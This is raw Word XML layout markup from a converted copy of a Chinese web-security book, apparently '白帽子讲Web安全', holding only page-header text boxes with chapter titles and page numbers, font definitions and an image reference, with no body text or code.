          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:right="-40"/>
      </w:pPr>
      <w:bookmarkStart w:name="fd" w:id="86"/>
      <w:bookmarkEnd w:id="86"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5544312" cy="7793735"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="47" name="image33.jpeg" descr=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="48" name="image33.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId98" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5544312" cy="7793735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="even" r:id="rId97"/>
      <w:pgSz w:w="8740" w:h="12280"/>
      <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="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ourier New">
    <w:altName w:val="Courier New"/>
    <w:charset w:val="0"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
  </w:font>
  <w:font w:name="Arial">
    <w:altName w:val="Arial"/>
    <w:charset w:val="0"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="PMingLiU">
    <w:altName w:val="PMingLiU"/>
    <w:charset w:val="0"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="SimSun">
    <w:altName w:val="SimSun"/>
    <w:charset w:val="0"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Wingdings">
    <w:altName w:val="Wingdings"/>
    <w:charset w:val="2"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="MS Office Symbol Bold">
    <w:altName w:val="MS Office Symbol Bold"/>
    <w:charset w:val="0"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Book Antiqua">
    <w:altName w:val="Book Antiqua"/>
    <w:charset w:val="0"/>
    <w:family w:val="roman"/>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71848" from="12.72pt,58.919971pt" to="423.84pt,58.919971pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
          <v:stroke dashstyle="solid"/>
          <w10:wrap type="none"/>
        </v:line>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:288.320007pt;margin-top:45.512218pt;width:106.55pt;height:12.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71824" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:spacing w:line="242" w:lineRule="exact" w:before="0"/>
                  <w:ind w:left="20" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>第 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>1 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>章 我的安全世界观</w:t>
                </w:r>
              </w:p>
            </w:txbxContent>
          </v:textbox>
          <w10:wrap type="none"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:407.079987pt;margin-top:45.992218pt;width:13.6pt;height:12.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71800" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:spacing w:before="11"/>
                  <w:ind w:left="40" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:instrText> PAGE </w:instrText>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:t>11</w:t>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="end"/>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71368" from="12.72pt,58.919971pt" to="423.84pt,58.919971pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
          <v:stroke dashstyle="solid"/>
          <w10:wrap type="none"/>
        </v:line>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:13.48pt;margin-top:45.512218pt;width:109.95pt;height:13pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71344" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:tabs>
                    <w:tab w:pos="586" w:val="left" w:leader="none"/>
                  </w:tabs>
                  <w:spacing w:line="242" w:lineRule="exact" w:before="0"/>
                  <w:ind w:left="40" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:instrText> PAGE </w:instrText>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:t>132</w:t>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:spacing w:val="-10"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>白帽子讲 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>Web</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:spacing w:val="-2"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t> </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>安全</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71320" from="12.72pt,58.919971pt" to="423.84pt,58.919971pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
          <v:stroke dashstyle="solid"/>
          <w10:wrap type="none"/>
        </v:line>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:248.360001pt;margin-top:45.512218pt;width:146.5pt;height:12.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71296" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:spacing w:line="242" w:lineRule="exact" w:before="0"/>
                  <w:ind w:left="20" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>第 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>5 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>章 点击劫持（</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>ClickJacking</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>）</w:t>
                </w:r>
              </w:p>
            </w:txbxContent>
          </v:textbox>
          <w10:wrap type="none"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:404.679993pt;margin-top:45.992218pt;width:18.4pt;height:12.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71272" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:spacing w:before="11"/>
                  <w:ind w:left="40" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:instrText> PAGE </w:instrText>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:t>133</w:t>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="end"/>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71248" from="12.72pt,58.919971pt" to="423.84pt,58.919971pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
          <v:stroke dashstyle="solid"/>
          <w10:wrap type="none"/>
        </v:line>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:291.799988pt;margin-top:45.512218pt;width:103.05pt;height:12.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71224" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:spacing w:line="242" w:lineRule="exact" w:before="0"/>
                  <w:ind w:left="20" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>第 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>12 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>章 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>Web </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>框架安全</w:t>
                </w:r>
              </w:p>
            </w:txbxContent>
          </v:textbox>
          <w10:wrap type="none"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:404.679993pt;margin-top:45.992218pt;width:18.4pt;height:12.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71200" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:spacing w:before="11"/>
                  <w:ind w:left="40" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:instrText> PAGE </w:instrText>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:t>281</w:t>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="end"/>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71176" from="12.72pt,58.919971pt" to="423.84pt,58.919971pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
          <v:stroke dashstyle="solid"/>
          <w10:wrap type="none"/>
        </v:line>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:13.48pt;margin-top:45.512218pt;width:109.95pt;height:13pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71152" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:tabs>
                    <w:tab w:pos="586" w:val="left" w:leader="none"/>
                  </w:tabs>
                  <w:spacing w:line="242" w:lineRule="exact" w:before="0"/>
                  <w:ind w:left="40" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:instrText> PAGE </w:instrText>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:t>282</w:t>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:spacing w:val="-10"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>白帽子讲 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>Web</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:spacing w:val="-2"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t> </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>安全</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71128" from="12.72pt,58.919971pt" to="423.84pt,58.919971pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
          <v:stroke dashstyle="solid"/>
          <w10:wrap type="none"/>
        </v:line>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:14.48pt;margin-top:45.512218pt;width:108.95pt;height:13pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71104" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:tabs>
                    <w:tab w:pos="566" w:val="left" w:leader="none"/>
                  </w:tabs>
                  <w:spacing w:line="242" w:lineRule="exact" w:before="0"/>
                  <w:ind w:left="20" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>290</w:t>
                  <w:tab/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:spacing w:val="-10"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>白帽子讲 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>Web</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:spacing w:val="-2"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t> </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>安全</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71080" from="12.72pt,58.919971pt" to="423.84pt,58.919971pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
          <v:stroke dashstyle="solid"/>
          <w10:wrap type="none"/>
        </v:line>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:291.799988pt;margin-top:45.512218pt;width:103.05pt;height:12.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71056" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:spacing w:line="242" w:lineRule="exact" w:before="0"/>
                  <w:ind w:left="20" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>第 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>12 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>章 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>Web </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>框架安全</w:t>
                </w:r>
              </w:p>
            </w:txbxContent>
          </v:textbox>
          <w10:wrap type="none"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:405.679993pt;margin-top:45.992218pt;width:16.4pt;height:12.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71032" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:spacing w:before="11"/>
                  <w:ind w:left="20" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>291</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71008" from="12.72pt,58.919971pt" to="423.84pt,58.919971pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
          <v:stroke dashstyle="solid"/>
          <w10:wrap type="none"/>
        </v:line>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:13.48pt;margin-top:45.512218pt;width:109.95pt;height:13pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-70984" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:tabs>
                    <w:tab w:pos="586" w:val="left" w:leader="none"/>
                  </w:tabs>
                  <w:spacing w:line="242" w:lineRule="exact" w:before="0"/>
                  <w:ind w:left="40" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:instrText> PAGE </w:instrText>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:t>292</w:t>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:spacing w:val="-10"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>白帽子讲 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>Web</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:spacing w:val="-2"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t> </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>安全</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70960" from="12.72pt,58.919971pt" to="423.84pt,58.919971pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
          <v:stroke dashstyle="solid"/>
          <w10:wrap type="none"/>
        </v:line>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:291.799988pt;margin-top:45.512218pt;width:103.05pt;height:12.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-70936" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:spacing w:line="242" w:lineRule="exact" w:before="0"/>
                  <w:ind w:left="20" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>第 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>12 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>章 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>Web </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>框架安全</w:t>
                </w:r>
              </w:p>
            </w:txbxContent>
          </v:textbox>
          <w10:wrap type="none"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:405.679993pt;margin-top:45.992218pt;width:16.4pt;height:12.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-70912" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:spacing w:before="11"/>
                  <w:ind w:left="20" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>293</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71776" from="12.72pt,58.919971pt" to="423.84pt,58.919971pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
          <v:stroke dashstyle="solid"/>
          <w10:wrap type="none"/>
        </v:line>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:15.88pt;margin-top:45.512218pt;width:107.55pt;height:13pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71752" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:tabs>
                    <w:tab w:pos="538" w:val="left" w:leader="none"/>
                  </w:tabs>
                  <w:spacing w:line="242" w:lineRule="exact" w:before="0"/>
                  <w:ind w:left="40" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:instrText> PAGE </w:instrText>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:t>10</w:t>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:spacing w:val="-10"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>白帽子讲 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>Web</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:spacing w:val="-2"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t> </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>安全</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71728" from="12.72pt,58.919971pt" to="423.84pt,58.919971pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
          <v:stroke dashstyle="solid"/>
          <w10:wrap type="none"/>
        </v:line>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:316.880005pt;margin-top:45.813099pt;width:77.850pt;height:11.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71704" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:spacing w:line="230" w:lineRule="exact" w:before="0"/>
